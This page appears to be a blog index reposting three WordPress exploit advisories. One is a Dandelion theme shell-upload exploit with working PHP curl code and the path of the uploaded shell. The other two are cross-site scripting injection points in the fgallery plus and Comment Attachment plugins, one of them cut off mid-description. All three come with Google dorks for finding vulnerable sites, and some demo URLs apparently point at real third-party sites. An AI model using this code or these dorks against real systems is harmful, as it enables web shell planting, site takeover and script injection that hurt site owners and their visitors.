wordpress vulnerability

WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

< ? php $uploadfile="yourfile.php"; $ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
? >

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php

Comments Off on WordPress Dandelion Theme Shell Upload Vulnerability

WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]

Comments Off on WordPress fgallery plus Plugin Xss vulnerabilities
  • WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-Vulnerability
    Permalink WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-VulnerabilityGallery

    WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

By |October 5th, 2013|

Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Date: 2013 20 September
Author: Arsan
author email: [email protected]
author twitter: @ArsanBlackhat
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Sitting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This […]

Comments Off on WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability